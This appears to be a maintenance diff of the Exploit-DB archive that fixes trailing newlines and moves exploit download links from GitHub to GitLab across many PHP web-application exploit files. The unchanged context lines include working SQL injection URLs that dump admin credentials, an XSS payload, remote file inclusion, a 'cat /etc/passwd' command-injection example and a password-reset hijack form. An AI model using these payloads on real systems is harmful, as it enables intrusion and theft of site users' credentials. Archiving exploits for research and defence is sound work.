+248,4 @@ for ($k=0;$k<=$#ARR;$k++) #======================================================================================================== -# milw0rm.com [2006-07-18] +# milw0rm.com [2006-07-18] \ No newline at end of file diff --git a/exploits/php/webapps/2035.php b/exploits/php/webapps/2035.php index 9a9dc970e..81b15a0c2 100644 --- a/exploits/php/webapps/2035.php +++ b/exploits/php/webapps/2035.php @@ -136,4 +136,4 @@ die($temp[1]);} echo "Exploit failed..."; ?> -# milw0rm.com [2006-07-18] +# milw0rm.com [2006-07-18] \ No newline at end of file diff --git a/exploits/php/webapps/20416.txt b/exploits/php/webapps/20416.txt index 7e6aa22a1..d91956879 100644 --- a/exploits/php/webapps/20416.txt +++ b/exploits/php/webapps/20416.txt @@ -38,5 +38,4 @@ Greetz: T0r3x, m1l05, JuMp-Er, EsC, UNICORN, Xermes, s4r4d0 ----------------------------snip-------------------------------------- Thanks, -~StRoNiX - +~StRoNiX \ No newline at end of file diff --git a/exploits/php/webapps/2050.php b/exploits/php/webapps/2050.php index 491abdafd..64ddc9938 100644 --- a/exploits/php/webapps/2050.php +++ b/exploits/php/webapps/2050.php @@ -145,4 +145,4 @@ die; echo "exploit failed..."; ?> -# milw0rm.com [2006-07-21] +# milw0rm.com [2006-07-21] \ No newline at end of file diff --git a/exploits/php/webapps/2068.php b/exploits/php/webapps/2068.php index 488881863..5dfb2691b 100644 --- a/exploits/php/webapps/2068.php +++ b/exploits/php/webapps/2068.php @@ -216,4 +216,4 @@ else {die("Exploit failed..");} ?> -# milw0rm.com [2006-07-24] +# milw0rm.com [2006-07-24] \ No newline at end of file diff --git a/exploits/php/webapps/2088.php b/exploits/php/webapps/2088.php index 452a58a96..9c448c149 100644 --- a/exploits/php/webapps/2088.php +++ b/exploits/php/webapps/2088.php @@ -257,4 +257,4 @@ echo "password (clear text) -> ".$my_password."\n"; echo "----------------------------------------------------------\n"; ?> -# milw0rm.com [2006-07-30] +# milw0rm.com [2006-07-30] \ No newline at end of file diff --git a/exploits/php/webapps/2095.txt b/exploits/php/webapps/2095.txt index ca5d27c6b..9745f328d 100644 --- a/exploits/php/webapps/2095.txt +++ b/exploits/php/webapps/2095.txt @@ -21,4 +21,4 @@ # ############################################################################## -# milw0rm.com [2006-07-31] +# milw0rm.com [2006-07-31] \ No newline at end of file diff --git a/exploits/php/webapps/2096.txt b/exploits/php/webapps/2096.txt index 7d0c359aa..47e86e1dd 100644 --- a/exploits/php/webapps/2096.txt +++ b/exploits/php/webapps/2096.txt @@ -52,4 +52,4 @@ EAR.php/&cmd=ls + +-------------------------[ E O F ]---------------------------------- -# milw0rm.com [2006-07-31] +# milw0rm.com [2006-07-31] \ No newline at end of file diff --git a/exploits/php/webapps/2098.txt b/exploits/php/webapps/2098.txt index 8b2ec594d..7ee4be6a4 100644 --- a/exploits/php/webapps/2098.txt +++ b/exploits/php/webapps/2098.txt @@ -44,4 +44,4 @@ + +-------------------------[ E O F ]---------------------------------- -# milw0rm.com [2006-08-01] +# milw0rm.com [2006-08-01] \ No newline at end of file diff --git a/exploits/php/webapps/20983.pl b/exploits/php/webapps/20983.pl index 7a570c7bd..25e1de43f 100755 --- a/exploits/php/webapps/20983.pl +++ b/exploits/php/webapps/20983.pl @@ -93,5 +93,4 @@ chomp(my $target=<STDIN>); _____________________________________________________ -Daniel Barragan "D4NB4R" 2012 - +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/exploits/php/webapps/2100.txt b/exploits/php/webapps/2100.txt index be9282f46..193e91f5e 100644 --- a/exploits/php/webapps/2100.txt +++ b/exploits/php/webapps/2100.txt @@ -45,4 +45,4 @@ + +-------------------------[ E O F ]---------------------------------- -# milw0rm.com [2006-08-01] +# milw0rm.com [2006-08-01] \ No newline at end of file diff --git a/exploits/php/webapps/2102.txt b/exploits/php/webapps/2102.txt index d7e0994ca..21c556879 100644 --- a/exploits/php/webapps/2102.txt +++ b/exploits/php/webapps/2102.txt @@ -35,4 +35,4 @@ #Skiing Gendiaaa Saw AzIZa SnIpEr_Sa Masry OSA FEGLA 3amer ================================================================= -# milw0rm.com [2006-08-01] +# milw0rm.com [2006-08-01] \ No newline at end of file diff --git a/exploits/php/webapps/2114.html b/exploits/php/webapps/2114.html index bb2e9bcda..aab7e782c 100644 --- a/exploits/php/webapps/2114.html +++ b/exploits/php/webapps/2114.html @@ -16,4 +16,4 @@ Existing User:<INPUT name=uname><br> document.forms[0].action=prompt("Path to forum","http://www.server.com/tpf/")+"updatepf.php"; </script> -# milw0rm.com [2006-08-02] +# milw0rm.com [2006-08-02] \ No newline at end of file diff --git a/exploits/php/webapps/2116.txt b/exploits/php/webapps/2116.txt index b11061ff5..a0e3ae076 100644 --- a/exploits/php/webapps/2116.txt +++ b/exploits/php/webapps/2116.txt @@ -22,4 +22,4 @@ Not-leet-enough: "Powered By TSEP" POC: http://hax.com/tsep/include/colorswitch.php?tsep_config[absPath]=http://remotefile/? -# milw0rm.com [2006-08-02] +# milw0rm.com [2006-08-02] \ No newline at end of file diff --git a/exploits/php/webapps/2117.php b/exploits/php/webapps/2117.php index d91462150..df06ae6cc 100644 --- a/exploits/php/webapps/2117.php +++ b/exploits/php/webapps/2117.php @@ -305,4 +305,4 @@ elseif ($action==4) else echo ("specify an action [1-4]..."); ?> -# milw0rm.com [2006-08-03] +# milw0rm.com [2006-08-03] \ No newline at end of file diff --git a/exploits/php/webapps/2118.php b/exploits/php/webapps/2118.php index 81e69768f..bce977a32 100644 --- a/exploits/php/webapps/2118.php +++ b/exploits/php/webapps/2118.php @@ -259,4 +259,4 @@ if (is_hash($temp2[0])) echo "exploit failed..."; ?> -# milw0rm.com [2006-08-07] +# milw0rm.com [2006-08-07] \ No newline at end of file diff --git a/exploits/php/webapps/21220.txt b/exploits/php/webapps/21220.txt index 48f66b850..57a66cdfe 100644 --- a/exploits/php/webapps/21220.txt +++ b/exploits/php/webapps/21220.txt @@ -95,4 +95,4 @@ Sepahan TelCom Network And Security Group (septelcom) www.septelcom.net -E-mail: amirhadi.yazdani@gmail.com,info@septelcom.net +E-mail: amirhadi.yazdani@gmail.com,info@septelcom.net \ No newline at end of file diff --git a/exploits/php/webapps/2123.txt b/exploits/php/webapps/2123.txt index 624b32146..1525d08ea 100644 --- a/exploits/php/webapps/2123.txt +++ b/exploits/php/webapps/2123.txt @@ -18,4 +18,4 @@ Att. SirDarckCat elhacker.net -# milw0rm.com [2006-08-07] +# milw0rm.com [2006-08-07] \ No newline at end of file diff --git a/exploits/php/webapps/21250.txt b/exploits/php/webapps/21250.txt index 87bb1bf23..442e4cfd4 100644 --- a/exploits/php/webapps/21250.txt +++ b/exploits/php/webapps/21250.txt @@ -26,4 +26,4 @@ change X with number of post [!x!] To: All friends Cyber_Devil Allah with you -members [No-exploit.Com] +members [No-exploit.Com] \ No newline at end of file diff --git a/exploits/php/webapps/2128.txt b/exploits/php/webapps/2128.txt index 0cd4a39ec..b8dd7e222 100644 --- a/exploits/php/webapps/2128.txt +++ b/exploits/php/webapps/2128.txt @@ -27,4 +27,4 @@ http://www.site.com/[sapidcms_path]/usr/extensions/get_tree.inc.php?GLOBALS[root #Pozdro dla wszystkich ;-) -# milw0rm.com [2006-08-07] +# milw0rm.com [2006-08-07] \ No newline at end of file diff --git a/exploits/php/webapps/21301.txt b/exploits/php/webapps/21301.txt index c174f1297..c1a69973e 100644 --- a/exploits/php/webapps/21301.txt +++ b/exploits/php/webapps/21301.txt @@ -8,4 +8,4 @@ OpenBB allows users to include images in forum messages using image tags, with t It is possible to inject arbitrary script code into forum messages via these image tags. Script code will be executed in the browser of the user viewing the forum message, in the context of the website running the vulnerable software. This may allow an attacker to steal cookie-based authentication credentials. -[img]javasCript:alert('Hello world.')[/img] +[img]javasCript:alert('Hello world.')[/img] \ No newline at end of file diff --git a/exploits/php/webapps/21715.txt b/exploits/php/webapps/21715.txt index 8b60e95ff..fef014146 100644 --- a/exploits/php/webapps/21715.txt +++ b/exploits/php/webapps/21715.txt @@ -48,5 +48,4 @@ Exploit: _____________________________________________________ -Daniel Barragan "D4NB4R" 2012 - +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/exploits/php/webapps/22004.txt b/exploits/php/webapps/22004.txt index cf26c4d5b..4f86aa80d 100644 --- a/exploits/php/webapps/22004.txt +++ b/exploits/php/webapps/22004.txt @@ -40,4 +40,4 @@ The Full path can be retrieved using Array method [] in ItemID & id Parameters . Example : - http://server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1 + http://server/index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1 \ No newline at end of file diff --git a/exploits/php/webapps/22089.txt b/exploits/php/webapps/22089.txt index 181b63d67..943240407 100644 --- a/exploits/php/webapps/22089.txt +++ b/exploits/php/webapps/22089.txt @@ -4,4 +4,4 @@ A vulnerability has been discovered in the PHP-Nuke Web Mail module. When a user By accessing a PHP script located in the web directory, arbitrary PHP commands will be executed on the target server. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22089.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22089.zip \ No newline at end of file diff --git a/exploits/php/webapps/22090.txt b/exploits/php/webapps/22090.txt index a37a40abc..c3a4554d6 100644 --- a/exploits/php/webapps/22090.txt +++ b/exploits/php/webapps/22090.txt @@ -2,4 +2,4 @@ source: https://www.securityfocus.com/bid/6400/info A vulnerability has been discovered in the PHP-Nuke web mail module. Due to insufficient sanitization of HTML emails it is possible for an attacker to embed script code into malicious messages. Opening an email containing attacker-supplied script code would result in the execution of arbitrary script code within the client's browser. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22090.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22090.zip \ No newline at end of file diff --git a/exploits/php/webapps/22097.txt b/exploits/php/webapps/22097.txt index 74a364f81..b23f05383 100644 --- a/exploits/php/webapps/22097.txt +++ b/exploits/php/webapps/22097.txt @@ -37,5 +37,4 @@ Exploit: _____________________________________________________ -Daniel Barragan "D4NB4R" 2012 - +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/exploits/php/webapps/22152.txt b/exploits/php/webapps/22152.txt index 8d1e80376..b63ad47ed 100644 --- a/exploits/php/webapps/22152.txt +++ b/exploits/php/webapps/22152.txt @@ -214,5 +214,4 @@ chomp(my $target=<STDIN>); _____________________________________________________ -Daniel Barragan "D4NB4R" 2012 - +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/exploits/php/webapps/22403.txt b/exploits/php/webapps/22403.txt index cfee13b9a..a1977b25e 100644 --- a/exploits/php/webapps/22403.txt +++ b/exploits/php/webapps/22403.txt @@ -61,5 +61,4 @@ Spider Catalog for Joomla! is a convenient tool for organizing the products repr _____________________________________________________ -Daniel Barragan "D4NB4R" 2012 - +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/exploits/php/webapps/22463.txt b/exploits/php/webapps/22463.txt index 06f27c7bc..65b87b963 100644 --- a/exploits/php/webapps/22463.txt +++ b/exploits/php/webapps/22463.txt @@ -92,5 +92,4 @@ be accompanied with an image. _____________________________________________________ -Daniel Barragan "D4NB4R" 2012 - +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/exploits/php/webapps/22473.txt b/exploits/php/webapps/22473.txt index 14319c51f..a23830499 100644 --- a/exploits/php/webapps/22473.txt +++ b/exploits/php/webapps/22473.txt @@ -10,4 +10,4 @@ http://www.example.com/albums/userpics/Copperminer.jpg.php?[command] Where command can be something like "id;uname%20-a" or "cat%20/etc/passwd" -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/22473.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22473.tar.gz \ No newline at end of file diff --git a/exploits/php/webapps/22710.txt b/exploits/php/webapps/22710.txt index 998577c9f..33df73dd1 100644 --- a/exploits/php/webapps/22710.txt +++ b/exploits/php/webapps/22710.txt @@ -35,4 +35,4 @@ --end- +-end- \ No newline at end of file diff --git a/exploits/php/webapps/22712.txt b/exploits/php/webapps/22712.txt index 02e5f48ec..7465737a7 100644 --- a/exploits/php/webapps/22712.txt +++ b/exploits/php/webapps/22712.txt @@ -46,4 +46,4 @@ -end- --end- +-end- \ No newline at end of file diff --git a/exploits/php/webapps/23028.txt b/exploits/php/webapps/23028.txt index a38d8e100..11cb12206 100644 --- a/exploits/php/webapps/23028.txt +++ b/exploits/php/webapps/23028.txt @@ -13,4 +13,4 @@ ## http://www.example.com/clients/packages.php?id=-1'+UNION+ALL+SELECT+1,CONCAT(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+adminusers%23 ########################################################################## # 0x31337.net -########################################################################## +########################################################################## \ No newline at end of file diff --git a/exploits/php/webapps/23029.txt b/exploits/php/webapps/23029.txt index 1e9d92044..5ee63d745 100644 --- a/exploits/php/webapps/23029.txt +++ b/exploits/php/webapps/23029.txt @@ -14,4 +14,4 @@ ## http://www.example.comindex.php?menuitem=26&domeinvraag=<script>alert(1);</script>&aktie=Zoek&idx=23 ########################################################################## # 0x31337.net -########################################################################## +########################################################################## \ No newline at end of file diff --git a/exploits/php/webapps/23106.txt b/exploits/php/webapps/23106.txt index 758156e51..c4d815fff 100644 --- a/exploits/php/webapps/23106.txt +++ b/exploits/php/webapps/23106.txt @@ -11,6 +11,4 @@ About 225 results (0.21 seconds) The vulnerability lies in the eventform.php file. -Entering your JavaScript into the form boxes and saving the event will store and trigger your persistent XSS script. Simplez. Have fun. - - +Entering your JavaScript into the form boxes and saving the event will store and trigger your persistent XSS script. Simplez. Have fun. \ No newline at end of file diff --git a/exploits/php/webapps/23249.txt b/exploits/php/webapps/23249.txt index 667d4fd03..d52cc9443 100644 --- a/exploits/php/webapps/23249.txt +++ b/exploits/php/webapps/23249.txt @@ -26,4 +26,4 @@ http://server/kingchat.php?chat=2&l=2&message= Your persistant XSS will be stored here. -Enjoy ;). VipVince. +Enjoy ;). VipVince. \ No newline at end of file diff --git a/exploits/php/webapps/23286.txt b/exploits/php/webapps/23286.txt index 5f82f998e..29f53ffc6 100644 --- a/exploits/php/webapps/23286.txt +++ b/exploits/php/webapps/23286.txt @@ -78,5 +78,4 @@ categories, prices and special fees can be translated. _____________________________________________________ -Daniel Barragan "D4NB4R" 2012 - +Daniel Barragan "D4NB4R" 2012 \ No newline at end of file diff --git a/exploits/php/webapps/24480.txt b/exploits/php/webapps/24480.txt index 37e581a00..3c99d06a2 100644 --- a/exploits/php/webapps/24480.txt +++ b/exploits/php/webapps/24480.txt @@ -22,4 +22,4 @@ Cheers! # - A valid account as at least a user # - The target to have outgoing internet connectivity -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/24480.tar.gz \ No newline at end of file +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/24480.tar.gz \ No newline at end of file diff --git a/exploits/php/webapps/24514.txt b/exploits/php/webapps/24514.txt index f10a50e60..22cff6609 100644 --- a/exploits/php/webapps/24514.txt +++ b/exploits/php/webapps/24514.txt @@ -36,4 +36,4 @@ # # xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx[ Thanks For All ]xxxxxxxxxxxxxxxxxxxxxxxxxxxxx # # Special Thanks : Burtay and All Janissaries Team(Burtay,B127Y,Miyachung,3spi0n,TheMirkin,Michelony,Mectruy) - ################################################################################# + ################################################################################# \ No newline at end of file diff --git a/exploits/php/webapps/24851.txt b/exploits/php/webapps/24851.txt index b07078d3a..bd8c0ecd7 100644 --- a/exploits/php/webapps/24851.txt +++ b/exploits/php/webapps/24851.txt @@ -14,4 +14,4 @@ Vulnerability : ?option=com_rsfiles&view=files&layout=agreement&tmpl=component&c http://server/?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- ********************************* -# Turkey. +# Turkey. \ No newline at end of file diff --git a/exploits/php/webapps/24879.txt b/exploits/php/webapps/24879.txt index 038c90c53..fbd36962f 100644 --- a/exploits/php/webapps/24879.txt +++ b/exploits/php/webapps/24879.txt @@ -85,6 +85,4 @@ $insertuser = mysql_query("INSERT INTO clients VALUES('', '$username', '$md5pass Only using stripslahes which will not protect against doing sql injection attack. -#independent Pakistani Security Researcher - - +#independent Pakistani Security Researcher \ No newline at end of file diff --git a/exploits/php/webapps/25168.c b/exploits/php/webapps/25168.c index c8e10b497..ac16ffb94 100644 --- a/exploits/php/webapps/25168.c +++ b/exploits/php/webapps/25168.c @@ -92,5 +92,4 @@ printf("Cookie modified: \n\n%s\n\n", contenido); printf("The cookies file has overwriten... looks like the exploit has worked"); } else printf("\n\nThe file cookies.txt has not write permissions."); return 0; -} - +} \ No newline at end of file diff --git a/exploits/php/webapps/25249.txt b/exploits/php/webapps/25249.txt index c1534c71d..1f8b62c7a 100644 --- a/exploits/php/webapps/25249.txt +++ b/exploits/php/webapps/25249.txt @@ -120,4 +120,4 @@ - Credits: - Ahmed Aboul-Ela - Information Security Consultant @ Starware Group + Ahmed Aboul-Ela - Information Security Consultant @ Starware Group \ No newline at end of file diff --git a/exploits/php/webapps/25410.txt b/exploits/php/webapps/25410.txt index 6bf0f1333..b34b6f79b 100644 --- a/exploits/php/webapps/25410.txt +++ b/exploits/php/webapps/25410.txt @@ -14,5 +14,4 @@ Sql Injection: server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1[sql] server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null'+/*!50000UnIoN*/+/*!50000SeLeCt*/group_concat(username,0x3a,password),222+from+jos_users-- - -#################################################################### - +#################################################################### \ No newline at end of file diff --git a/exploits/php/webapps/25726.txt b/exploits/php/webapps/25726.txt index bae1653d6..ed048375a 100644 --- a/exploits/php/webapps/25726.txt +++ b/exploits/php/webapps/25726.txt @@ -25,4 +25,4 @@ $query = "SELECT * FROM `playlist` WHERE $playlist_id;"; http://server/radio/meneger.php?fold=/var/www/music&search=1%27&playlist_id=&playlist_id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12 -################################################ +################################################ \ No newline at end of file diff --git a/exploits/php/webapps/26111.txt b/exploits/php/webapps/26111.txt index 62433fd23..13ef238b9 100644 --- a/exploits/php/webapps/26111.txt +++ b/exploits/php/webapps/26111.txt @@ -4,4 +4,4 @@ Gravity Board X (GBX) is affected by an unauthorized access vulnerability. This An attacker can exploit this vulnerability and modify an existing CSS template to include arbitrary PHP code. The attacker can then call the stored template and have the malicious PHP code executed in the context of the Web server process. This may aid the attacker in further attacks against the underlying system. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/26111.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/26111.zip \ No newline at end of file diff --git a/exploits/php/webapps/26213.txt b/exploits/php/webapps/26213.txt index 8edd2383e..386144e71 100644 --- a/exploits/php/webapps/26213.txt +++ b/exploits/php/webapps/26213.txt @@ -41,4 +41,4 @@ EXPLOIT POC ################################################################################################################ Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 -################################################################################################################ +################################################################################################################ \ No newline at end of file diff --git a/exploits/php/webapps/26425.pl b/exploits/php/webapps/26425.pl index b092cc1f6..ac5ebc89a 100755 --- a/exploits/php/webapps/26425.pl +++ b/exploits/php/webapps/26425.pl @@ -66,4 +66,4 @@ print ("\n\n"); exit(); -# batznet-security.de && batznet.com +# batznet-security.de && batznet.com \ No newline at end of file diff --git a/exploits/php/webapps/27450.txt b/exploits/php/webapps/27450.txt index 86cbd07fa..55ab4502c 100644 --- a/exploits/php/webapps/27450.txt +++ b/exploits/php/webapps/27450.txt @@ -4,4 +4,4 @@ Reportedly, an attacker can carry out directory-traversal attacks. These issues A successful attack can allow the attacker to place potentially malicious files and overwrite files on a computer in the context of the user running the affected application. A successful exploit may aid in further attacks. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27450.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27450.zip \ No newline at end of file diff --git a/exploits/php/webapps/28139.txt b/exploits/php/webapps/28139.txt index 436723d75..21ebb2dfc 100644 --- a/exploits/php/webapps/28139.txt +++ b/exploits/php/webapps/28139.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to have arbitrary script code execute in t GET http://www.example.com:80/gen_confirm_mem.php HTTP/1.0 Accept: */* Host: www.example.com -Cookie: PHPSESSID="><script>alert(/Ellipsis+Security+Test/)</script> +Cookie: PHPSESSID="><script>alert(/Ellipsis+Security+Test/)</script> \ No newline at end of file diff --git a/exploits/php/webapps/28586.txt b/exploits/php/webapps/28586.txt index 017bf991d..d9d156cbe 100644 --- a/exploits/php/webapps/28586.txt +++ b/exploits/php/webapps/28586.txt @@ -6,7 +6,4 @@ A successful exploit of these vulnerabilities could allow an attacker to comprom if magic_quotes_gpc = off login with user name : ' or id=1/* or ' or authorization = 4/* index.php?n=http://www.example.com/modules/register&a=3&d=3&key='%20or%20id=1/* -You will be able to change the password for any user .. know his id and put it in the url. -- or you can use this form by changing http://localhost/jupiter/ to the website dir to recive reset password email to all the administrators <form method="post" action="http://localhost/jupiter/index.php?n=http://www.example.com/modules/register"> <table class="main" cellspacing="1" cellpadding="4" width="100%"> <tr class="head"> <td colspan="2" class="head">Forgot your password?</td> </tr> <tr> <td class="con1" width="42%" valign="middle"><span class="hilight">Username:</span></td> <td class="con1" width="58%" valign="bottom"><input type="text" name="fpwusername" style="width:100%" class="box" tabindex="5" value="' union select id,authorization ,username ,password ,'security@soqor.net',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,ca lendarbday,status,multikey,actime from users where id=1or authorization=4/*"></td> </tr> <tr> <td class="con1"><input type="button" style="width:100" class="box" value="Back" onClick="window.history.go(-1);" tabindex="8"></td> <td class="con1" align="right"><input type="submit" style="width:100" class="box" value="Submit" tabindex="7"></td> </tr> <input type="hidden" name="a" value="3"> <input type="hidden" name="d" value="1"> </table> </form> put the user name value Change security@soqor.net to your email ' union select id,authorization ,username ,password ,'security@soqor.net',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,ca lendarbday,status,multikey,actime from users where id=1or authorization=4/* - - - +You will be able to change the password for any user .. know his id and put it in the url. -- or you can use this form by changing http://localhost/jupiter/ to the website dir to recive reset password email to all the administrators <form method="post" action="http://localhost/jupiter/index.php?n=http://www.example.com/modules/register"> <table class="main" cellspacing="1" cellpadding="4" width="100%"> <tr class="head"> <td colspan="2" class="head">Forgot your password?</td> </tr> <tr> <td class="con1" width="42%" valign="middle"><span class="hilight">Username:</span></td> <td class="con1" width="58%" valign="bottom"><input type="text" name="fpwusername" style="width:100%" class="box" tabindex="5" value="' union select id,authorization ,username ,password ,'security@soqor.net',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,ca lendarbday,status,multikey,actime from users where id=1or authorization=4/*"></td> </tr> <tr> <td class="con1"><input type="button" style="width:100" class="box" value="Back" onClick="window.history.go(-1);" tabindex="8"></td> <td class="con1" align="right"><input type="submit" style="width:100" class="box" value="Submit" tabindex="7"></td> </tr> <input type="hidden" name="a" value="3"> <input type="hidden" name="d" value="1"> </table> </form> put the user name value Change security@soqor.net to your email ' union select id,authorization ,username ,password ,'security@soqor.net',url,age,flag,location,registered,lastvisit,forum_lastvisit,ip,forumposts,signature,aboutme,msn,yahoo,icq,aim,skype,avatar,hideemail,templates,ca lendarbday,status,multikey,actime from users where id=1or authorization=4/* \ No newline at end of file diff --git a/exploits/php/webapps/28844.txt b/exploits/php/webapps/28844.txt index cbef68919..07283e426 100644 --- a/exploits/php/webapps/28844.txt +++ b/exploits/php/webapps/28844.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code execute in t cPanel version 10.9.0 is vulnerable; other versions may also be affected. -http://www.example.com:2082/scripts2/editzonetemplate?template=[XssCodes] +http://www.example.com:2082/scripts2/editzonetemplate?template=[XssCodes] \ No newline at end of file diff --git a/exploits/php/webapps/28896.txt b/exploits/php/webapps/28896.txt index 5383a253a..e54bb227d 100644 --- a/exploits/php/webapps/28896.txt +++ b/exploits/php/webapps/28896.txt @@ -4,4 +4,4 @@ RunCMS is prone to an arbitrary file-upload vulnerability. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28896.php.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28896.php.zip \ No newline at end of file diff --git a/exploits/php/webapps/29451.txt b/exploits/php/webapps/29451.txt index 4942b05ba..b5f5afe50 100644 --- a/exploits/php/webapps/29451.txt +++ b/exploits/php/webapps/29451.txt @@ -8,7 +8,4 @@ All In One Control Panel 1.3.009 and prior versions are vulnerable. http://www.example.com/AIOCP/public/code/cp_downloads.php?did=[sql] -http://www.example.org/AIOCP/public/code/cp_downloads.php?did='+UNION+SELECT+NULL,NULL,NULL,NULL,user_id,NULL,NULL,user_name,NULL,user_password,NULL,NULL,NULL,NULL,NULL+FROM+aiocp_users+WHERE+user_name<>'Anonymous - - - +http://www.example.org/AIOCP/public/code/cp_downloads.php?did='+UNION+SELECT+NULL,NULL,NULL,NULL,user_id,NULL,NULL,user_name,NULL,user_password,NULL,NULL,NULL,NULL,NULL+FROM+aiocp_users+WHERE+user_name<>'Anonymous \ No newline at end of file diff --git a/exploits/php/webapps/29998.txt b/exploits/php/webapps/29998.txt index 6686e877c..9fc17ec41 100644 --- a/exploits/php/webapps/29998.txt +++ b/exploits/php/webapps/29998.txt @@ -6,4 +6,4 @@ Exploiting this issue allows remote attackers to execute code in the context of This issue affects Campsite 2.6.1. Earlier versions may also be affected. -http://www.example.com/classes/User.php?g_DocumentRoot=shell.txt? +http://www.example.com/classes/User.php?g_DocumentRoot=shell.txt? \ No newline at end of file diff --git a/exploits/php/webapps/30105.txt b/exploits/php/webapps/30105.txt index ce1989532..9405ec1bb 100644 --- a/exploits/php/webapps/30105.txt +++ b/exploits/php/webapps/30105.txt @@ -31,5 +31,4 @@ scripting. The payload used is <input onmouseover=prompt(document.cookie)> More information, including screenshots, can be found at: -http://www.nerdbox.it/wordpress-download-manager-xss/ - +http://www.nerdbox.it/wordpress-download-manager-xss/ \ No newline at end of file diff --git a/exploits/php/webapps/30877.txt b/exploits/php/webapps/30877.txt index 3c3f7896a..bb60ea370 100644 --- a/exploits/php/webapps/30877.txt +++ b/exploits/php/webapps/30877.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to execute arbitrary script code in the browser Roundcube Webmail 0.1rc2 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30877.eml \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30877.eml \ No newline at end of file diff --git a/exploits/php/webapps/30926.txt b/exploits/php/webapps/30926.txt index 5f8e7f773..dfd94d30e 100644 --- a/exploits/php/webapps/30926.txt +++ b/exploits/php/webapps/30926.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br These issues affect Dokeos 1.8.4 and earlier versions. -http://www.example.com/main/work/work.php?cidReq=[Forum-ID]&curdirpath=/&display_upload_form=true&origin=XSS +http://www.example.com/main/work/work.php?cidReq=[Forum-ID]&curdirpath=/&display_upload_form=true&origin=XSS \ No newline at end of file diff --git a/exploits/php/webapps/30946.txt b/exploits/php/webapps/30946.txt index e610b3ef2..90d9e517d 100644 --- a/exploits/php/webapps/30946.txt +++ b/exploits/php/webapps/30946.txt @@ -73,5 +73,4 @@ Disclosure Timeline: Advisory discovered by: Yogesh Phadtare Secur-I Research Group - http://securview.com/ - + http://securview.com/ \ No newline at end of file diff --git a/exploits/php/webapps/31678.txt b/exploits/php/webapps/31678.txt index e99c40ff9..f0d73f3c8 100644 --- a/exploits/php/webapps/31678.txt +++ b/exploits/php/webapps/31678.txt @@ -4,4 +4,4 @@ SMF (Simple Machine Forum) is prone to a security-bypass vulnerability that occu Successfully exploiting this issue may allow attackers to send unsolicited spam or perform other automated attacks. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31678.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31678.zip \ No newline at end of file diff --git a/exploits/php/webapps/32868.txt b/exploits/php/webapps/32868.txt index a526ed4a3..babc3becc 100644 --- a/exploits/php/webapps/32868.txt +++ b/exploits/php/webapps/32868.txt @@ -53,4 +53,4 @@ Discovered by dxw: ================ Tom Adams >>>>>>> 65c687d5cb3c4aa66c28a30a4f2aaf33169dc464 -Please visit security.dxw.com for more information. +Please visit security.dxw.com for more information. \ No newline at end of file diff --git a/exploits/php/webapps/33030.txt b/exploits/php/webapps/33030.txt index 605117231..a01e0a2a7 100644 --- a/exploits/php/webapps/33030.txt +++ b/exploits/php/webapps/33030.txt @@ -30,4 +30,4 @@ file_exists("admin/" . $admin . ".php")) { . ".php"); } -----------[exploit Fin] +----------[exploit Fin] \ No newline at end of file diff --git a/exploits/php/webapps/33072.txt 